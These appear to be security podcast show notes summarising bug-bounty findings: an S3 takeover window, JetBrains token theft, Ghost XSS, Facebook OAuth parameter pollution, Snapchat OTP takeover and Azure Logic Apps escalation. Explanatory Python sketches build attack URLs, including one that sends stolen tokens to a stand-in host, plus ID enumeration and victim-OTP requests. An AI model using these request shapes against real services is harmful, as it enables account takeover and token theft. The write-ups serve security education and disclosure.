Show Notes

79 - Takeover a Facebook, SnapChat or JetBrains account

MarkMonitor is a domain management solution that protects corporate brands from things like internet counterfeiting, fraud, domain squatting, etc.

As such, they own and register thousands of domain names. On August 28th, the author’s automation for detecting unregistered S3 buckets started exploding, firing hundreds of alerts in minutes. Their system registered over 800 buckets.

It turns out that for a brief period all 60,000 of MarkMonitor’s parked domains were pointing to S3 buckets that didn’t exist, giving attackers a window during which they could claim the buckets and serve arbitrary content as the original domain.

Around an hour after this happened the domains started serving the correct content again. At first I didn’t think this was a huge issue because it was so short-lived and would have required a very well-prepared attacker. That said, one easily automated step would be something like registering for an HTTPS certificate, which could be quite damaging for the victim domains and any targeted victim.
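Detection of this sort of takeover window is easy to automate. As a rough sketch (not the author’s actual tooling): a scanner can treat any domain whose response carries S3’s documented `NoSuchBucket` error as a takeover candidate, since that error means the bucket the domain points at is unregistered and claimable.

```python
# Rough sketch of classifying S3 subdomain-takeover candidates.
# Not the author's tooling; NoSuchBucket is S3's documented error code
# for a bucket that does not exist, everything else is illustrative.

def takeover_candidate(status_code: int, body: str) -> bool:
    """A 404 carrying S3's NoSuchBucket error code means the bucket the
    domain points at does not exist and could be registered by anyone."""
    return status_code == 404 and "NoSuchBucket" in body
```

Note the distinction this relies on: a missing bucket (`NoSuchBucket`, claimable) responds differently from a private but existing one (`AccessDenied`, not claimable).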

After finding an open redirect in Datalore’s endpoint for authenticating via JetBrains, the author dug into the auth process to see if it could be turned into an attack. They discovered that if an auth_url parameter was specified (which had to be a valid JetBrains subdomain), Datalore would send the user, as well as their JWT token, to the given URL. This URL could include the very page which had this open redirect issue. By setting the auth_url to the open redirect page and passing in an attacker-controlled JetBrains JWT token, an attacker could get both the victim’s Datalore token and the attacker’s own JetBrains token sent to a malicious site.
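The shape of the attack URL can be sketched with plain URL construction. The auth_url parameter comes from the write-up; the concrete paths, parameter names, and hosts below are hypothetical placeholders, not the real Datalore endpoints.

```python
from urllib.parse import urlencode, quote

# Illustrative reconstruction of the attack URL. Only auth_url comes from
# the write-up; every path and parameter name below is a hypothetical
# placeholder.
ATTACKER_JWT = "attacker.jetbrains.jwt"  # attacker's own JetBrains token
OPEN_REDIRECT = "https://datalore.jetbrains.com/redirect_page"  # hypothetical path

# auth_url must point at a JetBrains subdomain -- the open-redirect page
# qualifies, and forwards whatever it receives on to the attacker's site.
params = {
    "auth_url": OPEN_REDIRECT + "?next=" + quote("https://evil.example/collect"),
    "jwt": ATTACKER_JWT,
}
attack_url = "https://datalore.jetbrains.com/auth?" + urlencode(params)
```

The key property is that the destination passes the "valid JetBrains subdomain" check while still delivering both tokens to the attacker.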

Patch The open redirect was fixed, and the legacy authentication process was removed altogether, instead relying on OAuth with JetBrains accounts as an identity provider.

When looking into the API internals of JetBrains’ YouTrack, the author discovered an undocumented endpoint for getting issue descriptions without any styling or markdown. This endpoint was not protected with role validation or any user authentication at all, likely because it’s only meant to be used internally. Any user could leak any issue’s description even if they didn’t have access to view it, including past reported (but potentially unfixed) security issues. The issue IDs look fairly guessable, so this bug would be easy to take advantage of.
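Since YouTrack issue IDs follow a PROJECT-N pattern, enumerating candidates is trivial. The sketch below only generates request URLs; the endpoint path is a hypothetical placeholder, as the write-up doesn’t name the real undocumented endpoint.

```python
# Sketch of enumerating guessable issue IDs. The endpoint path is a
# hypothetical placeholder -- the real undocumented endpoint isn't
# named in the write-up. No requests are sent here.

def candidate_urls(base: str, project: str, count: int) -> list[str]:
    """Generate request URLs for sequential PROJECT-N issue IDs."""
    endpoint = f"{base}/undocumented/raw-description"  # hypothetical path
    return [f"{endpoint}?issue={project}-{n}" for n in range(1, count + 1)]

urls = candidate_urls("https://youtrack.example.com", "SEC", 3)
```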

Ghost 4.0.0 added a theme preview feature to the admin panel’s front-end. The preview page contains a message event listener for postMessage(), which takes any message and writes its contents directly into the page. There’s no verification of the origin of the message, nor are any frame options or a frame-ancestors CSP directive set.

As the page can be framed by any attacker-controlled page and will write any JavaScript to be executed, this provides an easy XSS vector to perform any action as a logged-in admin.

Patch The patch here was to remove that code altogether, though the blog post’s authors point out that to properly fix this, the origin just needed to be checked.
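That origin check is a one-line guard. Sketched here in Python for brevity (the real listener is browser-side JavaScript), the idea is that the handler drops any message whose origin isn’t the expected admin origin before touching the page:

```python
# Python mirror of the browser-side fix: only accept postMessage events
# from the expected origin. ALLOWED_ORIGIN is an illustrative value.
ALLOWED_ORIGIN = "https://admin.example.com"

def handle_preview_message(event_origin: str, payload: str):
    """Return content to render, or None if the sender is untrusted."""
    if event_origin != ALLOWED_ORIGIN:
        return None  # message came from a framing attacker page; ignore it
    return payload
```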

tl;dr - The OAuth endpoint parses the URL parameters redirect_uri and redirect_uri[0 (note the missing ]) as pointing to the same variable, allowing the second to overwrite the first. The front-end, however, sees them as two distinct keys, so it redirects the OAuth token to the redirect_uri while the endpoint validates that the other value points to a whitelisted location.

  • Facebook validates attempts to register to receive cross-origin messages without an origin by checking that the registered app owns the URL. The problem is that actions such as the OAuth dialog allow you to specify any app_id, so you can receive messages intended for other origins, enabling capture of first-party OAuth tokens.
  • Version information can be provided by the attacker and is simply prepended to the requested endpoint. Without validation, an attacker can cause requests to go to unexpected endpoints like the GraphQL API.

Three vulnerabilities, each receiving a $42,000 bounty, all dealing with message passing between attacker-controlled iframes hosting Facebook games and apps and the parent Facebook frame. The child frames use postMessage(...) to have the parent frame perform some action on behalf of the iframe.

Bug 1 - HTTP Parameter Pollution

One of the available actions is a jsonrpc action to call the showDialog method, used to show an OAuth login dialog to the end-user and, once the application has been authorized, pass an access token back to the originating iframe. The parameters of this jsonrpc call are attacker-controlled and used to provide the various OAuth parameters; redirect_uri and APP_ID are the two that matter here.

In the postMessage call, you also provide an origin parameter. This value is used as the targetOrigin when the parent frame responds.

Under normal circumstances you provide your application’s APP_ID and origin, and Facebook will craft an OAuth request with the redirect_uri set to its own arbiter page, so it can catch the OAuth reply and proxy it back to the iframe. This also means that the APP_ID must whitelist that redirect_uri with the origin domain, and the response containing the token Facebook captures will be sent in a message targeting specifically that domain.

The attack comes down to how the parameters are processed. The parent frame simply appends all the provided parameters, along with those it generated (the redirect_uri), to the OAuth URL. Not an issue on its own, but the bug is in the difference between redirect_uri=... and redirect_uri[0=... (notice the missing ]). In the JSON RPC call these are two distinct keys; to the OAuth server, however, both redirect_uri= and redirect_uri[0= get parsed as the same key, redirect_uri. This enables an attacker to provide their own redirect_uri value.

The attack here abuses the parameter pollution bug to create a desync over which redirect_uri is being used. This allows the attacker to use the APP_ID belonging to Instagram and replace the generated redirect_uri with a valid Instagram redirect. When the server sees the request, it sees the Instagram APP_ID and redirect_uri, thinks everything is okay, and replies to the browser okaying the redirect. The browser, however, sees the original redirect_uri as the valid one and redirects there with the token, handing the attacker Instagram’s token.
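The desync is easy to model with two query-string parsers: a strict one (the browser-side view, where redirect_uri and redirect_uri[0 are distinct keys) and a lenient one that, like the OAuth server, collapses a key with an unmatched bracket so both become redirect_uri, last value winning. Both parsers below are illustrative stand-ins, not Facebook’s actual code.

```python
# Simulating the HTTP parameter pollution desync. These two parsers are
# illustrative stand-ins, not Facebook's real implementations.

def strict_parse(query: str) -> dict:
    """Browser-side view: every key is taken literally."""
    out = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        out[key] = value
    return out

def lenient_parse(query: str) -> dict:
    """Server-side view: an unmatched '[' truncates the key, so
    redirect_uri and redirect_uri[0 collide (last value wins)."""
    out = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if "[" in key and "]" not in key:
            key = key.split("[")[0]
        out[key] = value
    return out

q = "redirect_uri=https://arbiter.example&redirect_uri[0=https://instagram.example/cb"
browser = strict_parse(q)   # two distinct keys; redirects to the first
server = lenient_parse(q)   # one key; validates the attacker's value
```

The server validates the attacker-supplied value while the browser redirects the token to the original one, which is exactly the split the bug exploits.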

This is a great example of how subtle some of the bugs that deal with translating requests from one application to another can be.

Bug 2 - Undefined Origin

From the last bug we saw the arbiter URL being used, with the origin= part of the fragment being the targetOrigin used for the response message. When it is missing from the URL, Facebook will check whether a global origin was registered on the page and use that instead.

In order to register the global origin, Facebook validates that the registered APP_ID has verified it owns the origin provided before allowing it to receive messages on its behalf. This is to prevent an application from registering to receive messages targeting another origin, for example.

There are two issues that work together here:

  • Some first-party applications have whitelisted the arbiter with no origin as a valid redirect_uri
  • Even though the APP_ID and origin are checked when registering the global origin, the OAuth request is not required to use the same APP_ID.

An attacker could register a global origin their application owns, then trigger an OAuth dialog to a first-party application that accepts the blank arbiter to receive the token.

Bug 3 - Versions can’t be harmful

Part of generating the end URI is the PlatformDialogClient.getURI function. This will prepend the API version to the /dialog/oauth endpoint. The version can be passed in as part of the parameters in the original message, and is not validated in any way. This means you can trick the OAuth dialog into making a request to other endpoints on the domain. The example used is sending a request to api/graphql/?... allowing an attacker to trigger GraphQL requests.
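The effect of the unvalidated version is plain string construction. The prepend logic below is a guess at the shape of getURI, not its actual code:

```python
# Illustrative model of PlatformDialogClient.getURI's version handling:
# the caller-supplied version is prepended to the endpoint unvalidated.
BASE = "https://www.facebook.com"  # assumed host

def get_uri(version: str, endpoint: str = "/dialog/oauth") -> str:
    return f"{BASE}/{version}{endpoint}"

normal = get_uri("v9.0")
# Supplying a "version" of api/graphql/? reroutes the request entirely,
# relegating the real endpoint to the query string:
abused = get_uri("api/graphql/?")
```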

I’m not sure what the normal flow for a “One Tap Password” is, but /scauth/otp/droid/logout can be used to retrieve an OTP token in the response, which can be passed to /scauth/otp/login along with the username to log in.

The problem is that the logout endpoint accepts and trusts a user_id parameter, so an attacker can put in a victim’s user_id and retrieve an OTP for the victim, allowing them to log in as that user.
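The two-step flow can be sketched as pure request construction. The endpoint paths and the user_id/username parameters come from the write-up; the host and remaining field names are assumptions, and no requests are actually sent.

```python
# Request shapes for the OTP flow described above. Endpoint paths and the
# user_id/username parameters come from the write-up; the host and other
# field names are assumptions. Nothing here touches the network.
HOST = "https://app.snapchat.com"  # assumed host

def logout_request(user_id: str) -> dict:
    # The bug: user_id is attacker-supplied and trusted by the server.
    return {"url": f"{HOST}/scauth/otp/droid/logout",
            "data": {"user_id": user_id}}

def login_request(username: str, otp: str) -> dict:
    return {"url": f"{HOST}/scauth/otp/login",
            "data": {"username": username, "otp": otp}}

step1 = logout_request("victim-user-id")          # response yields the OTP
step2 = login_request("victim", "otp-from-step1")  # log in as the victim
```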

tl;dr - Some research examining how an attacker could abuse Azure Logic Apps access to escalate their privileges.

  • The first is that sensitive information can be exposed with reader access: secrets attached to components, the run history, and past versions (and their components)
  • The second is a consideration of how some components can be reused for other purposes. An API connection included for one purpose might have more permissions than expected, which a contributor would have access to.

Azure Logic Apps is Microsoft Azure’s low-code development platform, used to automate some types of workflows without needing to write code. Low-code development is becoming increasingly common; I wouldn’t call it popular, but it has a definite presence.

This post isn’t covering any specific vulnerabilities but rather a series of potential attacks, should you have access to a Logic App, for how you might escalate to further access.

Reader Access - Essentially you have access to read the Logic Apps; it’s one of the more basic permissions available, and you can’t write or “contribute” to them. A reader can simply read out the raw definition of a logic application. This includes any associated inputs, including potential secrets.

What’s a bit more interesting to me is that they call out the Run History and Versions areas as being accessible also:

  • Run History gives you access to all the previous runs of the application, including any secrets that might have been printed during development builds; by default even sensitive actions will print their output.
  • The Versions area gives you access to all the previous versions of the application, whether or not they were executed, including any hardcoded credentials that might have been included during early development.
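Both areas are reachable through Azure’s ARM REST API with only read permissions. The resource paths below follow the Microsoft.Logic provider’s layout; the subscription, resource group, and workflow names are placeholders, and the api-version is one commonly used with Logic Apps rather than a guaranteed current value.

```python
# ARM REST paths for the two data sources a reader can pull from.
# Placeholder identifiers throughout; the api-version shown is one
# commonly used with Logic Apps, not necessarily the latest.
SUB, RG, WF = "sub-id", "my-rg", "my-logic-app"
API = "api-version=2016-06-01"
base = (f"https://management.azure.com/subscriptions/{SUB}"
        f"/resourceGroups/{RG}/providers/Microsoft.Logic/workflows/{WF}")

runs_url = f"{base}/runs?{API}"          # run history, with action inputs/outputs
versions_url = f"{base}/versions?{API}"  # every saved definition, executed or not
```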

Contributor access - Access to modify the Logic Applications. This is a much higher ask in terms of permissions for an attacker, and the issue detailed is also a bit more debatable, as it does not violate the permission model.

The attack scenario described is abusing access that might be granted for one use-case but also offers other functionality. Imagine the scenario where a developer can contribute within the dev environment resource group, but an admin adds an application that for its own purposes establishes an API Connection to something over in the production environment.

An attacker could then take that API Connection the admin created for their particular application and reuse it to access other features of the API that the admin might not have intended.

The author admits this is a contrived example, but it is illustrative of the types of issues to be looking for should you have this level of access. The fundamental principle of the attack is that the permissions granted to any API connection or other application the Logic Apps interact with are permissions granted to all contributors.

The post ends with a brief discussion of the defensive side, some best practices that are similar to standard application development. Things like not hard-coding sensitive information but retrieving it from a secure service, and being aware of the permissions the API connections have.